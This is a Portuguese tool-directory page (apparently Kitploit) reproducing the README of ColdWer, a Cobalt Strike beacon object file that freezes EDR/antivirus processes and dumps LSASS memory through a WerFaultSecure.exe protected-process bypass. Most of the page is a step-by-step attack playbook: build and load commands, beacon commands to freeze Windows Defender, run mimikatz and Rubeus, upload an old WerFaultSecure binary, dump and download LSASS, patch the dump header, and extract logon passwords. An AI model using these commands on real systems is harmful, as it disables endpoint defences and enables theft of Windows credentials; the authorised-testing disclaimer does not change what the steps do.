Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ColdWer — Cobalt Strike BOF para congelar processos de EDR/AV e despejar LSASS usando o bypass PPL do WerFaultSecure.exe | Kitploit
Ferramentas/GitHubGitHub/0xsh3llf1r3/coldwer
Escalada de PrivilégiosExploraçãoMovimento LateralPós-ExploraçãoRed TeamingDesenvolvimento de Payloads
GitHub0xsh3llf1r3/coldwer

ColdWer

Cobalt Strike BOF para congelar processos de EDR/AV e despejar LSASS usando o bypass PPL do WerFaultSecure.exe

Ver Repositório
14423há 6 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ColdWer
Uma guerra fria no seu endpoint.

Stars Forks License


🥶 ColdWer

ColdWer usa o bypass de PPL do WerFaultSecure.exe para congelar processos de EDR/AV e despejar a memória do LSASS em sistemas Windows modernos.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Congele seu EDR/AV. Extraia o que precisa. Fique frio.


👤 Autor

Sh3llf1r3 (@0xsh3llf1r3)


🙏 Créditos

Este projeto se baseia em pesquisas de TwoSevenOneT (@TwoSevenOneT):

ProjetoDescrição
EDR-FreezeTécnica original de congelamento de EDR
WSASSDespejo do LSASS via WerFaultSecure

Todo crédito pelas técnicas subjacentes vai para TwoSevenOneT.


🔥 Funcionalidades


🚀 Primeiros Passos

📋 Pré-requisitos

  • Cobalt Strike 4.x
  • Beacon de alta integridade (Administrador/SYSTEM)

💾 Instalação

  1. Clone o repositório:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Carregue o script aggressor no Cobalt Strike:
  • Vá em Cobalt Strike → Script Manager
  • Clique em Load
  • Selecione cw/coldwer.cna

📦 Compilando a partir do código-fonte

root@kitploit:~
# Navegue para o diretório de origem
cd src/

# Compile o BOF (requer MinGW)
make

# Ou manualmente:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Download Rápido

  1. Vá para Releases
  2. Baixe coldwer.o e coldwer.cna
  3. Coloque ambos na mesma pasta
  4. Carregue coldwer.cna no Cobalt Strike

🖥️ Uso

❄️ Congelar EDR/AV

root@kitploit:~
# Encontre o PID do Windows Defender
beacon> ps

# Congele o processo
beacon> cw-freeze 1337

# Execute seus comandos enquanto o EDR/AV está congelado
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Descongele quando terminar
beacon> cw-unfreeze

🔓 Despejar LSASS

root@kitploit:~

# Passo 1: Faça upload do WerFaultSecure.exe do Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Passo 2: Encontre o PID do LSASS
beacon> ps

# Passo 3: Despeje o LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Passo 4: Baixe o despejo
beacon> download C:\Windows\Temp\lsass.dmp

🔧 Após o Download

Altere o cabeçalho do arquivo para restaurar o formato minidump:

Original (PNG)Alterar para (MDMP)
89 50 4E 474D 44 4D 50

Comandos para restaurar o cabeçalho:

MétodoComando
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Em seguida, analise com o Mimikatz:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Comandos

ComandoDescrição
cw-freeze <PID> [Path]Congelar processo
cw-unfreezeDescongelar processo anteriormente congelado
cw-dump <PID> <Path>Despejar memória do LSASS

📝 Exemplos

root@kitploit:~
# Congelar com caminho padrão
beacon> cw-freeze 1337

# Usar WerFaultSecure.exe customizado
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Despejar LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Descongelar quando terminar
beacon> cw-unfreeze

✅ Alvos Suportados

AlvoStatus
Windows Defender (MsMpEng.exe)✅ Funciona
LSASS (lsass.exe)✅ Funciona
Outros processos PPL✅ Funciona

⚠️ Limitações

NÃO funciona contra EDRs com autoproteção em modo kernel:

EDRStatus
Elastic Endpoint❌ Bloqueado
CrowdStrike Falcon❌ Bloqueado
SentinelOne❌ Bloqueado
Carbon Black❌ Bloqueado

⚙️ Como Funciona

root@kitploit:~
1. 🚀 Inicie o WerFaultSecure.exe como PPL (nível WinTcb)
                    ↓
2. 🎯 WerFaultSecure anexa ao processo alvo
                    ↓
3. ⏸️  MiniDumpWriteDump suspende todas as threads do alvo
                    ↓
4. 🥶 Suspenda o próprio WerFaultSecure → O alvo permanece congelado
                    ↓
5. ✅ Execute seus comandos (o EDR/AV não pode ver!)
                    ↓
6. 🔥 Encerre o WerFaultSecure → O alvo descongela

🔑 Por que o WerFaultSecure do Win8.1?

VersãoSaída
Windows 10/11Apenas despejo criptografado
Windows 8.1Despejo bruto não criptografado

🔍 Solução de Problemas


⚖️ Aviso Legal

root@kitploit:~
⚠️ APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta destina-se a:
- Testes de penetração autorizados
- Operações de red team com permissão por escrito
- Pesquisa de segurança em ambientes controlados

O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
O acesso não autorizado a sistemas de computador é ilegal.

📜 Licença

Licença MIT - Veja LICENSE


🥶 Fique Frio. Fique Quieto. 🥶

⭐ Dê uma estrela neste repositório se achar útil! ⭐

Baixar ferramenta
FuncionalidadeDescrição
❄️ CongelarColoca processos de EDR/AV em estado de coma
🔓 DespejarExtrai memória do LSASS contornando o PPL
🛡️ Bypass de PPLUtiliza o WerFaultSecure.exe no nível WinTcb
⚡ RápidoExecução inline de BOF
🎯 Controle ManualVocê decide quando congelar e descongelar
ErroCausaSolução
Arquivo não encontradoCaminho inválidoVerifique o caminho do WerFaultSecure.exe
Acesso negadoPrivilégios baixosExecute como Administrador/SYSTEM
Assinatura inválidaBinário não assinadoUse um WerFaultSecure.exe devidamente assinado
O processo não existePID incorretoVerifique o PID com o comando ps
Alvo protegidoProteção de kernelO EDR tem autoproteção (não contornável)
Já congeladoEstado travadoExecute cw-unfreeze primeiro